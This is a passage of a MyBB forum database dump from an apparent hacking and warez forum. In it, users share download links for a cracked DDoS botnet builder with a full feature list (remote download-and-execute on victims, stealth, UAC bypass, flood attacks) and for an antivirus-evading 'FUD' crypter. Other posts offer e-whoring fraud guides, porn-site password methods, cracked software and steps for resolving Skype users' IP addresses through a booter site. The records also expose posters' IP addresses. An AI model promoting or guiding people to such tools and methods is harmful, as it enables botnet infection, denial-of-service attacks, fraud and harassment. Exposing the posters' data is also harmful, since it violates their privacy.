'VirtualLegend', '1350857733', 'What for plugin is it, and what does it do?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2f7b432e7fb5e541d94c246346365476', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5953', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '5', 'Timmy', '1350857831', 'You need to post to see the content.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '09b572e70f5a8bc7aa060f2199bf821e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5954', '963', '5430', '17', 'RE: ??SIEGRIED\'S EWHORE METHOD ??', '0', '228', 'VirtualLegend', '1350857876', 'Thanks for the share bro', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd78c7bb8d7c21386160d4c5903173920', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5958', '963', '5430', '17', 'RE: ??SIEGRIED\'S EWHORE METHOD ??', '0', '62', 'R?????zo?', '1350857998', 'you\'re all welcome bro, thanks for the feedback. EDIT: I can\'t fix the image.', '94.132.244.168', '1585771688', '1', '0', '62', '1350858016', '1', '62f16a055d7c9709200f291d5a7e1e3c', '0', '1350858016'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5956', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '4', 'Triple H', '1350857892', 'Posting posting posting posting', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a2fb4b319cf98fc6604c241dd977b086', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5957', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '62', 'R?????zo?', '1350857930', 'wow this is cool, I think we should have this really prevents people from leeching.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9fb4c704103346a3cb68f927c74e2052', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5960', '1032', '0', '3', 'Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '1', 't3h jok3r', '1350859516', 'Thanks to everyone who helped L33T Hacking reach 1,000 threads today. Movie RIPs section is password protected, you need 40 posts in order to gain access to the forum. After you get 40 posts, PM any Staff member or any Admin. Logo has been resized and centered. The header links are also centered and the background behind the links will be removed soon. I might also add a background behind the logo. Post here and PM me has been BANNED! All new threads will now have to make their download links public. I have added a new plugin, you can/should use the following code while posting download links. [code] [lock]CONTENT HERE[/lock] [/code] Demo: http://l33thacking.net/thread-1031-lastpost.html The editor message color is now white, you can easily see what you are typing. From now on you can now click on your username to visit your profile, the current color is green which makes it kinda hard to see because of the welcomeblock background. I\'m also working on it and trying to change the username link color. Awards have been added. Check out the Awards help document [url=http://l33thacking.net/misc.php?action=help&hid=12]here[/url] I have added a couple of new mycodes, you can check them out [url=http://l33thacking.net/misc.php?action=help&hid=7]here[/url]. Should be updated in the next 10 minutes. Elite Award fixed! Marketplace will be added in [i]November[/i]. [b]Milestones[/b] 1. LH reached 1K threads 2. Suggestions forum has 200 posts 3. We have 50 tutorials in our hacking tutorials section. 4. We have over 1K thousand PIDs in our warez section. 5. R?????zo? has almost reached 400 posts. One post left. 6. We now have 30 tutorials in our graphic tutorials section. 7. I reached 900 posts', '72.231.24.165', '1223104677', '1', '0', '1', '1350860307', '1', '96e9bbbf6b2dc4998dfcf4f0ec90424f', '0', '1350860307'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5961', '1033', '0', '30', '[FREEInstagram Bot [Worth 47$]', '0', '62', 'R?????zo?', '1350859569', '[quote=\'***.\' pid=\'23704774\' dateline=\'1340215079\'] [b][color=#FF1493]Ques: What is Instagram bot?[/color][/b] [b][color=#32CD32]Ans: Just go here [url=http://www.instagrambot.com/]HERE[/url][/color][/b] [b][color=#FFA500]Its worth 47$ but you\'ll get it for free.[/color][/b] [b][color=#FF1493]How to get it?[/color][/b] [b][color=#32CD32]Just post here and PM me[/color][/b][/quote] Download: http://www.mediafire.com/?9t7j7b772p0ebyv Virus scan: https://www.virustotal.com/file/f62bd1060b41c785631be90f46e37fefc75d3e55abdbe6bdcd4bb187f657822c/analysis/1350147459/ [img]http://img842.imageshack.us/img842/4117/4c439627c4294e4db56859c.png[/img]', '94.132.244.168', '1585771688', '1', '0', '62', '1350859631', '1', 'bcd5df39f0b7671064b78e0bad0c69d3', '0', '1350859631'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5962', '1034', '0', '81', '[Cracked] Dark DDoSeR 5.1', '0', '62', 'R?????zo?', '1350859705', 'Here I have Dark DDoSeR 5.1 Cracked by The Old Warrior run at your own risk [color=#FF0000]Client Features[/color] [spoiler] [-] Menu [+] Multi-Listen Socket Feature (Any Port) [+] Select # (Selects custom number of zombies) [+] Find IP (Locates and selects the IP in the listview) [+] Friends List (Keep yourself organized on who is truly your friend or foe) [+] DDoS History (Automatically keeps your victims saved) [+] Server Build (Create your server with personal settings) [++] Connect [+++] Host/DNS (DynDNS, no-ip, etc) [+++] Port (Chose any Port for server to connect) [+++] Reconnect Interval (sec) [+++] Registry Key (Startup) [+++] Registry Value (Startup) [+++] Mutex (Keep your server.exe from running again at the same time!) [+++] UPX Compression (Compress your .exe 60% smaller than normal size!) [++] Build [+++] Download server.exe [+] Options [++] Listview [+++] Change (.bmp) (Changes listview background to personal backgrounds) [+++] Remove (.bmp) (Choose to have no background in listview) [+++] Add/Remove Gridlines [+++] Color [++++] ForeColor (Change to custom color) [++++] BackColor (Change to custom color) [++] Form [+++] Theme [++++] Browse... (Change Theme of Client - Over 100 themes) [++++] Remove (Remove the theme - Compatible with Linux Wine) [+++] Text [++++] Font (Change to personal font) [++++] ForeColor (Change to custom color) [++++] BackColor (Change to custom color) [-] Commands [++] Show DNS (Show what DNS the server connects to) [++] DL/Execute (Download and execute a file on victim) [++] Update (Download and execute a file on victim, then uninstall) [++] Restart (Restart server - using temporary, auto-generated mutex) [++] Re-connect (Re-establishes connection with server) [++] Close (Exits process of server, does not remove registry) [++] Uninstall (Remove registry and disconnect server) [-] DDoS [+] Multi-threaded UDP Flood [+] SSYN Flood [+] HTTP Flood -> IP Address (Chose the host for attack) -> Port (Chose a custom Port) -> Type (Chose UDP or SSYN) -> Speed (Speed of attack) -> Size (Size of each Packet) -> Packets (Number of data sent) -> UDP Strength (Stable or Aggressive) -> Stop Timer (Automatically stop ddos after certain amount of seconds) -> Automatic Flood (floods in _ seconds, for _ seconds) -> Selected Only (Attack with only the selected zombies) --> Send Command (Start Attack) --> Stop Command (Stop Attack) [-] Statusbar (Located on bottom of client) [+] Status (Tells of lost connections, etc) [+] New Infections (Keeps track on # of new infections while client has been open) [+] Peak (Climax of zombies in listview) [+] Zombies Online [+] Time [-] Other [+] Works on all Windows (Including Vista, and Seven - Both 32 and 64 bit) [+] UAC Work-around (Won\'t prompt user - Registry -> Current User) [+] Stealth (Quietly runs on infected user\'s PC without prompt) [+] Ping Pong (Checks if the infected user is still responsive) [+] Instant Response (Infected users respond instantly) [+] Lifetime Membership and Updates! [+] Instant Access (As soon as you purchase, you will recieve access to Portal) [+] Membership to Portal (Change DNS, Serial, Password, etc) [+] ONLY $25! [+] Sleek GUI Change! [+] Cryptable ** [+] Strong, Reliable DDOS [+] 37.5 KB Stub; When compressed = 19.5 KB [/spoiler] [color=#00BFFF]vScan:[/color][url=http://adfoc.us/7778111152521]vScan for all you NOOBS[/url] [color=#0000CD]Download:[/color] [url=http://adfoc.us/7778111152467]Say Thanks :)[/url]', '94.132.244.168', '1585771688', '1', '0', '62', '1350861646', '1', '8d2df7e092aab87f3c56d215a7647e23', '0', '1350861646'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5992', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350861668', 'Edit your other post from earlier with that userbar.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d54a21bd439e64e696a89d4491c267d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5963', '1035', '0', '20', 'NEW | FREE | Aegis Crypter | 100%FUD | UPDATE[14/10/2012]', '0', '62', 'R?????zo?', '1350859841', '[img]http://sphotos-b.xx.fbcdn.net/hphotos-ash3/560769_128145394001192_22428087_n.jpg[/img] Features: FUD 100% Runtime All Windows (32 + 64 Bit) Compiled Visual Studio 2010 and Visual C++ 6.0 Contains Five Stub Download Link: [url=http://aegiscrypter.googlecode.com/files/Aegis%20Crypter%20Bete0.1.zip]click here[/url] virus scan-[url=http://virusscan.jotti.org/en/scanresult/fb601b1bff050912bffb25cc0d28d06430ad20b1]scan[/url]', '94.132.244.168', '1585771688', '1', '0', '62', '1350859855', '1', '5dfbdd7cf622270af1652eeb960ff2bd', '0', '1350859855'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5964', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '82', 'iTzIpod', '1350860271', 'Also, if you haven\'t noticed, you can easily bypass the \"lock\" plugin thingy. Just click on Quote and then you can see what\'s there.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '30000769a997a9506e4409c8930aad93', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5965', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '3', '??????????¢™', '1350860313', 'Nice now that fixes the problem for leechers a little bit.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'fb39dcc3c5db430854dda1cb87680721', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5975', '1036', '0', '30', 'Mega SEO Pack', '0', '62', 'R?????zo?', '1350860809', 'If you want to see your site/forum on top, then here is the solution. This pack includes... The premium softwares with cracks+patches... [u][color=#006400][size=large][b]Download:[/b][/size][/color][/u] http://www.mediafire.com/?nm1o235up9ojbni', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '433f485502084a8eec5bf9687d1125dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5967', '1019', '5943', '3', 'RE: Do you like your new?', '0', '82', 'iTzIpod', '1350860469', '[quote=\'ƒ???????????g\' pid=\'5943\' dateline=\'1350853468\'] Love how itzipod has like every award... [/quote] Pssh. I would\'ve had more than this. But he forgot to give all of them to me. Also, I\'m back to LH now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9b308718a9a6c3826ad4dd4c6a91a7ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5968', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350860508', '/me has a History Project due on November 8th and hasn\'t started yet.. Also, needs new shoes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1657d1a5ff7bffc78f9487a8d6045ef1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5969', '1032', '5964', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '1', 't3h jok3r', '1350860527', '[quote=\'iTzIpod\' pid=\'5964\' dateline=\'1350860271\'] Also, if you haven\'t noticed, you can easily bypass the \"lock\" plugin thingy. Just click on Quote and then you can see what\'s there. [/quote] I think you are talking of an older version of the plugin. I checked it out and it works perfectly, so maybe the bypass is of an older version.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b0387c5bd72b3fe33412a5bb4252f2c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5970', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '82', 'iTzIpod', '1350860581', 'Oh okay. Nevermind. OT: Oh shit. Marketplace is coming back? I\'m gonna sell some stuff over there.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ccaa9f10d24e6b6ddf0761fb7505c2cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5971', '431', '5959', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '228', 'VirtualLegend', '1350860633', '[quote=\'R?????zo?\' pid=\'5959\' dateline=\'1350859125\'] [quote=\'VirtualLegend\' pid=\'5930\' dateline=\'1350848314\'] Can you make me a userbar for my upcoming group Marketers Size: Idk the size of a Userbar Colour Scheme: Green Render/Image: Dollar image Text: Marketers Anything else: Suprise me Contact me on skype when ur done of when ur stuck [/quote] had no idea what to make So I made it like this: [img]http://i.imgur.com/ifvO7.gif[/img] Hope you like it, pm\'ed you on skype too. [/quote] Bro this awesome you sir have talent 1000 times Thanks', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '029aa5f75271d7657061e83addd56f87', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5972', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1350860673', 'Looks really good @Reloadzor :) Good job.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cefb7762419bd2591f415d903b243ad0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5973', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '228', 'VirtualLegend', '1350860724', 'The new userbar created by Reload [img]http://i.imgur.com/ifvO7.gif[/img]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'f2df129ff6d1ed95f4910304b7b5c5ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5974', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '62', 'R?????zo?', '1350860735', 'I think the \"You must post to unlock this link\" is a good idea, but it also blocks links on people signatures.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c80855a512c78c3183da212bc5b25cbb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5976', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '228', 'VirtualLegend', '1350860861', 'LH is getting more advanced!!! Hope will get a other great plugin', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'cfe0006f6454db61ef0f2498f17e5ab0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5977', '1037', '0', '30', 'Empireviews Type 2 Bot', '0', '62', 'R?????zo?', '1350860869', 'Here\'s the New EmpireViews bot!, its sick!. [quote]- There no IE or other browser will show using this bot. I use WebRequest to surf link - U can also speed up gain point using this bot - screenshot[/quote] [img]http://i48.tinypic.com/bf49x4.jpg[/img] Download. [spoiler] Virus scan: https://www.virustotal.com/file/945cc53fd49d2669cf98ead1d0f7fb919c5a2e71ad8104d7ede024598f6ea7d4/analysis/ http://www.2shared.com/file/r7ExOSHj/empireviews.html [/spoiler]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f220fcf3964369e8d13e83c08c617ea8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5978', '1037', '5977', '30', 'RE: Empireviews Type 2 Bot', '0', '100', '??zg???g????61', '1350861016', 'Ohh looks like a nice bot, thanks Reload ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '98404ef676de0cd67d03f2c81c86d6d8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5979', '1038', '0', '17', 'Viral Adult Goldmine™ Combined E-whoring Method?', '0', '62', 'R?????zo?', '1350861034', '[align=center][img]http://i732.photobucket.com/albums/ww328/Firefury87/EMF/Final_part1.png[/img][/align] Download: http://www.mediafire.com/download.php?upq4ykq0x4a8kxe', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd85ea87d068321276e155fc36dc4fa76', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5980', '1037', '5977', '30', 'RE: Empireviews Type 2 Bot', '0', '257', 'XxTREYZxX', '1350861097', 'thanks for the great bot appreciated :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '4dfdbf842d000bda89851be9abb9c192', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5981', '1038', '5979', '17', 'RE: Viral Adult Goldmine™ Combined E-whoring Method?', '0', '257', 'XxTREYZxX', '1350861174', 'may i have it please thanks in advance', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '6f56717e583e6e1842425dc4ce7ab4f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5982', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1350861223', 'Glad you like it :) Always here to help.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '189807f9d0704c0cc33ae699e318298f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5983', '1035', '5963', '20', 'RE: NEW | FREE | Aegis Crypter | 100%FUD | UPDATE[14/10/2012]', '0', '100', '??zg???g????61', '1350861232', ':O thanks a TON dude! Could you post proof of the %100 FUD? Thanks :D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'a4a513073b9a90b996209f6d9c36efbc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5984', '1039', '0', '61', 'Jump Start Your brain -Get easy A\'s in school + BOOST brain power,IMPROVE memory', '0', '62', 'R?????zo?', '1350861266', '[align=center][img]http://i.imgur.com/UVul3.png[/img] Download: https://www.dropbox.com/s/anuimjhv8349c1z/Jump%20start%20the%20brain.%20%281%29.pdf[/align]', '94.132.244.168', '1585771688', '1', '0', '1', '1350861917', '1', '928d5db8bd946d7d681207c739441051', '0', '1350861917'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5985', '1033', '5961', '30', 'RE: [FREEInstagram Bot [Worth 47$]', '0', '100', '??zg???g????61', '1350861300', 'Lol dude post after post you are giving some HQ stuff :DD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '712c2e99f7b32262d86aeb720ef7410c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5986', '1040', '0', '61', 'How To Get Passes To Porn Sites', '0', '62', 'R?????zo?', '1350861351', 'Just check it out: [lock]http://www.mediafire.com/view/?b0fojy3s4iojzj1[/lock]', '94.132.244.168', '1585771688', '1', '0', '62', '1352550880', '1', '3d2ba0b5178a35ad06dca4e3a20a6ced', '0', '1352550880'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5987', '1034', '5962', '81', 'RE: [Cracked] Dark DDoSeR 5.1', '0', '100', '??zg???g????61', '1350861401', 'Thanks a ton man :D The Old Warrior is a great cracker.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '32cdae9f1c7741c6a3e5ae08d99be66d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5988', '1038', '5979', '17', 'RE: Viral Adult Goldmine™ Combined E-whoring Method?', '0', '62', 'R?????zo?', '1350861450', 'The download link is on the thread.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '5f8f73b37ee2313801c486ccfb84e035', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5989', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '257', 'XxTREYZxX', '1350861455', 'we are growing more and more every day but not sure about the:you must post to unlock this link.Its kinda confusing. Go LH', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '4a25ad9d80555234f2233f1b87ae3d28', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5990', '1038', '5988', '17', 'RE: Viral Adult Goldmine™ Combined E-whoring Method?', '0', '257', 'XxTREYZxX', '1350861530', '[quote=\'R?????zo?\' pid=\'5988\' dateline=\'1350861450\'] The download link is on the thread. [/quote] yeah i know but is said post to unlock.Now i got it thanks mate :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '4ec9763cc5aafdfe4c35422e0e5982ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5991', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1350861620', 'You\'re doing a good job Reloadzor running Unique! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc543b2d37241dca5419dea9784908af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5993', '1034', '5962', '81', 'RE: [Cracked] Dark DDoSeR 5.1', '0', '62', 'R?????zo?', '1350861669', 'Yeah he\'s great, thats a good DDoS\'er I think :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '08bbdad7048513c729b2acce48058ef8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5994', '1041', '0', '81', 'How to get a FREE Skype Resolver/Cloudflare Resolver', '0', '100', '??zg???g????61', '1350861694', 'Alright so, this is really simple, I learned it when I was still a young skid. In this tutorial we will exploit a crappy HF Booter. Here are the 4 simple steps- 1.) Go to www.absoboot.com 2.) Register an account and login. 3.) Navigate to the \"Boot\" tab on the top of the page. 4.) In the box that says \"IP Lookup\" type in skype:username replacing the username with the desired skype name. If you want to resolve a cloudflare protected IP just type in the website URL. Thats it everyone, thanks for being active members and apart of DDoS\'ers ;)', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'ac2a5f67e5e93e269051b23fd8e0d72b', '0', '0'); INSERT INTO 